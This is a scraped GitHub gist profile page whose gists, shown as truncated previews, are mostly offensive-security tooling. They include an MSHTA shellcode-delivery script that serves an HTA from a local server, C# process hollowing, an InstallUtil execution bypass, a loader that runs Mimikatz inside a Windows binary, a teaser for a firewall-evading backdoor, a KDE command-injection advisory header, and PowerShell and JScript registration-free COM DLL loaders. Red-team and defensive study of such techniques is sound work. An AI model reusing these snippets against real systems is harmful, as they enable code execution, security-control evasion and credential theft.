Skip to content

Instantly share code, notes, and snippets.

View xenoscr's full-sized avatar
💭
Human Popsicle

Conor Richard xenoscr

💭
Human Popsicle
104 followers · 5 following
View GitHub Profile
@xenoscr
xenoscr / pr.md
Created March 22, 2019 18:31 — forked from piscisaureus/pr.md
Checkout github pull requests locally

Locate the section for your github remote in the .git/config file. It looks like this:

[remote "origin"]
	fetch = +refs/heads/*:refs/remotes/origin/*
	url = [email protected]:joyent/node.git

Now add the line fetch = +refs/pull/*/head:refs/remotes/origin/pr/* to this section. Obviously, change the github url to match your project's URL. It ends up looking like this:

@xenoscr
xenoscr / blog.txt
Created March 27, 2019 01:57
Gist Blog - Inside Out, Simple backdoors
From the inside out, a minimalist backdoor.
I'm a pretty big fan of simple, and elegant. In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.
We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel
While I have a full compact, custom version, I will not release this.
@xenoscr
xenoscr / TestMSHTAShellcodeDelivery.ps1
Created April 11, 2019 12:50
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credtis for CACTUSTORCH HERE
I was in escape sequcence hell ;-)
' ( ) ( )
@xenoscr
xenoscr / Hollowing.cs
Created April 18, 2019 19:23 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <[email protected]>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
@xenoscr
xenoscr / gethelp.cs
Created May 14, 2019 09:41
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@xenoscr
xenoscr / Tasks.cs
Created August 3, 2019 14:03
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
@xenoscr
xenoscr / kde-kdesktopfile-command-injection.txt
Created August 5, 2019 02:00 — forked from zeropwn/kde-kdesktopfile-command-injection.txt
KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class.
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
Title: KDE 4/5 KDesktopFile Command Injection
Date: July 28th 2019
@xenoscr
xenoscr / NtQuerySystemInformation.h
Created January 29, 2020 02:52 — forked from jNizM/NtQuerySystemInformation.h
Undocumented NtQuerySystemInformation Structures
// http://www.exploit-monday.com/2013/06/undocumented-ntquerysysteminformation.html
// //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0x0000,
SystemProcessorInformation = 0x0001,
SystemPerformanceInformation = 0x0002,
SystemTimeOfDayInformation = 0x0003,
@xenoscr
xenoscr / DllLoadAnythingViaScript
Created February 11, 2020 13:46 — forked from analyticsearch/DllLoadAnythingViaScript
DynamicWrapperX - Dropper , Registration-Free Execution
#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.
# Sample DLL To inject here
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179
$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>';
$ax = new-object -Com "Microsoft.Windows.ActCtx"
$ax.ManifestText = $manifest;
$DWX = $ax.CreateObject("JustMakeSomethingUp");
@xenoscr
xenoscr / basic.js
Created March 31, 2020 02:03
Basic / MyDLL
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Windows\\System32\\Tasks';
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null"
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager";
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <dependency><dependentAssembly> <assemblyIdentity name="tasks" version="0.0.0.0"/> </dependentAssembly> </dependency> <assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" ru